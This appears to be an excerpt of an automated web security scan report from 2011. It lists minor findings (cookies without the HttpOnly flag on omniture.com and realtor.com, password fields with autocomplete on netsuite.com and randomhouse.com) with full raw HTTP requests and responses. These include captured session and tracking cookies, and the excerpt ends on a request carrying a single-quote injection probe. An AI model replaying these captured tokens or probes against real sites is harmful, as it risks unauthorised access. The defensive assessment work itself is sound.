The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/marketing_integration/genesis/applications/39/543 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; s_cc=true; mbox=PC#1303601743323-887111.17#1306271462|check#true#1303852326|session#1303852218540-851916#1303854122; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:44 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:44 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:44 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:44 GMT; path=/; domain=omniture.com
Content-Length: 25810


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture Genesis Applications |
...[SNIP]...

14.175. http://www.omniture.com/en/products/multichannel_analytics/insight  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/multichannel_analytics/insight

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics/insight HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_iid=30199; s_osc=30199; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271431|check#true#1303852291|session#1303852218540-851916#1303854091

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:36 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:36 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:36 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:36 GMT; path=/; domain=omniture.com
Content-Length: 31371


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Insight | Channel Ma
...[SNIP]...

14.176. http://www.omniture.com/en/products/multichannel_analytics/insight_retail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/multichannel_analytics/insight_retail

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/multichannel_analytics/insight_retail HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_iid=30199; s_osc=30199; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271432|check#true#1303852292|session#1303852218540-851916#1303854092

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:40 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:40 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:40 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:40 GMT; path=/; domain=omniture.com
Content-Length: 32191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Insight for Retail | Channel An
...[SNIP]...

14.177. http://www.omniture.com/en/products/online_analytics/digitalpulse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/digitalpulse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/digitalpulse HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271428|check#true#1303852288|session#1303852218540-851916#1303854088

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:31 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:31 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:31 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:31 GMT; path=/; domain=omniture.com
Content-Length: 30867


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Analytics | Web Analytic
...[SNIP]...

14.178. http://www.omniture.com/en/products/online_analytics/discover  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/discover

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/discover HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271426|check#true#1303852286|session#1303852218540-851916#1303854086

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:29 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:29 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:29 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:29 GMT; path=/; domain=omniture.com
Content-Length: 30980


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Online Analytics | D
...[SNIP]...

14.179. http://www.omniture.com/en/products/online_analytics/sitecatalyst  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/sitecatalyst

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/sitecatalyst HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271419|check#true#1303852279|session#1303852218540-851916#1303854079

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:23 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:23 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:23 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:23 GMT; path=/; domain=omniture.com
Content-Length: 39922


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Analytics | Web Analytic
...[SNIP]...

14.180. http://www.omniture.com/en/products/online_analytics/survey  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/online_analytics/survey

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/online_analytics/survey HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271424|check#true#1303852284|session#1303852218540-851916#1303854084

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:16:28 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:16:28 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:16:28 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:16:28 GMT; path=/; domain=omniture.com
Content-Length: 29081


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Online Survey, Voice of Custome
...[SNIP]...

14.181. http://www.omniture.com/en/products/open_business_analytics_platform/datawarehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /en/products/open_business_analytics_platform/datawarehouse

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en/products/open_business_analytics_platform/datawarehouse HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; omniture_unique=112017266a99890bba572ea82148c69e; BIGipServerhttp_omniture=84542986.5892.0000; s_iid=30199; s_osc=30199; s_cc=true; s_sq=%5B%5BB%5D%5D; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; mbox=PC#1303601743323-887111.17#1306271438|check#true#1303852298|session#1303852218540-851916#1303854098

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:18:22 GMT
Cache-Control: public, max-age=14400
Last-Modified: Tue, 26 Apr 2011 21:18:22 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:18:22 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:18:22 GMT; path=/; domain=omniture.com
Content-Length: 22266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Omniture | Open Business Analyt
...[SNIP]...

14.182. http://www.omniture.com/offer/943  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.omniture.com
Path:   /offer/943

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /offer/943?s_osc=30199 HTTP/1.1
Host: www.omniture.com
Proxy-Connection: keep-alive
Referer: http://www.omniture.com/en/products/conversion/testandtarget
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=8ee1d10d-cce1-42b6-8bb1-95eb59d8f5ba; campaign_stack=%5B%5B%22seo_other_referer%22%2C%221303601755097%22%5D%5D; _jsuid=9992808058213638945; search_stack=%5B%5B%22seo_other_referer%22%2C%221303601967106%22%5D%5D; s_cid=seo_other_referer; sc_locale_numbers=en_US; sc_locale=en_US; cms_site_lang=1; s_iid=1327; omniture_unique=112017266a99890bba572ea82148c69e; imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; BIGipServerhttp_omniture=84542986.5892.0000; s_cc=true; mbox=PC#1303601743323-887111.17#1306269330|check#true#1303850212|session#1303850129880-628856#1303851990|signal-click#productpage_feature-clicked%26mboxTarget%3D34394.4497#1303854916; s_sq=omniturecom%2Comnitureall%2Comniturecomdev%2Comniturecomemea%2Comnitureapac%2Comniturenoncustomer%2Comniturecomen%3D%2526pid%253DTest%252526Target%2526pidt%253D1%2526oid%253Dhttp%25253A//www.omniture.com/offer/943%25253Fs_osc%25253D30199%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Expires: Wed, 27 Apr 2011 21:15:48 GMT
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Tue, 26 Apr 2011 21:15:48 GMT
P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA"
xserver: www5.dmz
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 26 Apr 2011 21:15:48 GMT
Connection: close
Set-Cookie: imploded_vars=173.193.214.243%7CNow+Defined+by+Test+and+Target%7C; expires=Mon, 25-Jul-2011 21:15:48 GMT; path=/; domain=omniture.com
Content-Length: 14317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en">
<head>
   <title>Which Promotions Do Your Custom
...[SNIP]...

14.183. http://www.realtor.com/search/widgetportal/Widget.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /search/widgetportal/Widget.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /search/widgetportal/Widget.aspx?wname=MainSearchXSLContainer&app=8bcac8850c63428982ba6b6b90c09cfa&zip=75207 HTTP/1.1
Host: www.realtor.com
Proxy-Connection: keep-alive
Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 18:46:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=02cqtyvthyh3kbzxkedpaqwg; path=/; HttpOnly
Set-Cookie: SAVEDITEMS=; domain=realtor.com; expires=Mon, 25-Apr-2011 18:46:19 GMT; path=/
Set-Cookie: criteria=sby=3&loc=75207&usrloc=75207&typ=3&status=1; domain=realtor.com; path=/
Set-Cookie: recAlertSearch=recAlertShown=false&sameSrch=false&saveLstCnt=0&sid=; domain=realtor.com; path=/
Set-Cookie: RecentSearch=loc%3dNew+York%2c+NY%26typ%3d3%26mnp%3d%26mxp%3d%26bd%3d0%26bth%3d0%26status%3d1; domain=realtor.com; expires=Thu, 26-Apr-2012 18:46:19 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
ntCoent-Length: 69807
Content-Length: 69807


<!DOCTYPE html>
<!--[if gte IE 8]><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE IE8 IE6+ IE7+ IE8+ IE8-"><![endif]-->
<!--[if IE 7]><html xmlns="http://www.w3.org/19
...[SNIP]...

15. Password field with autocomplete enabled  previous  next
There are 16 instances of this issue:


15.1. https://checkout.netsuite.com/s.nl  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /s.nl

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /s.nl?c=1142057&sc=4&whence=&n=1&ext=F&redirect_count=1&did_javascript_redirect=T HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Referer: https://checkout.netsuite.com/s.nl?c=1142057&sc=4&whence=&n=1&ext=F
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bn_u=6923519460848807096; __utma=19239463.1836009711.1303743280.1303743280.1303743280.1; __utmz=19239463.1303743280.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); mbox=PC#1303736347554-914602.17#1304955927|check#true#1303746387|session#1303743154006-383984#1303748187; JSESSIONID=RPwlN37bBGN1BHsvqNxQ1vGBsr26W2BPCyktJKKZMYNbn8B0yWp44RPTyL4skYr9MQJLJQclG4l9NpdBQ6NlhFTGlWJt4trMCxT6LyM5FzLTxKnn4bw07h6pskHCrpHz!534658191; NLVisitorId=rcHW8655Ac-HwJur; NLShopperId=rcHW8655AeSHwA-v; NS_VER=2011.1.0; gc=1142057_clear

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 21:41:25 GMT
Server: Apache
Cache-Control: No-Cache,no-store
Pragma: No-Cache
Expires: 0
NS_RTIMER_COMPOSITE: -1256033290:616363742D6A6176613034302E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: gc=1142057_clear; domain=checkout.netsuite.com; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=915
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 83852


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>
...[SNIP]...
<td width=0 height=0 align='left' valign='top' style='display:none'>
<form method='post' name='login' id='login' action='/app/site/backend/customerlogin.nl'>
<input type='hidden' name='origsc' value='4'>
...[SNIP]...
<span style="white-space: nowrap" id="retpwd_fs" class="effectStatic"><input onBlur="if (this.checkvalid == true) {this.isvalid=validate_field(this,'password',false,false);} if (this.isvalid == false) { selectAndFocusField(this); return this.isvalid;} " id="retpwd" maxlength="20" onChange="setWindowChanged(window, true);this.isvalid=validate_field(this,'password',true,false);this.checkvalid=false;if (this.isvalid) {;}if (!this.isvalid) { selectAndFocusField(this);}return this.isvalid;" name="retpwd" value="" class="inputreq" onFocus="if (this.isvalid == true || this.isvalid == false) this.checkvalid=true;" type="password" size="20"></span>
...[SNIP]...

15.2. https://ecommerce.randomhouse.com//email-password.do  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://ecommerce.randomhouse.com
Path:   //email-password.do

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET //email-password.do?from=' HTTP/1.1
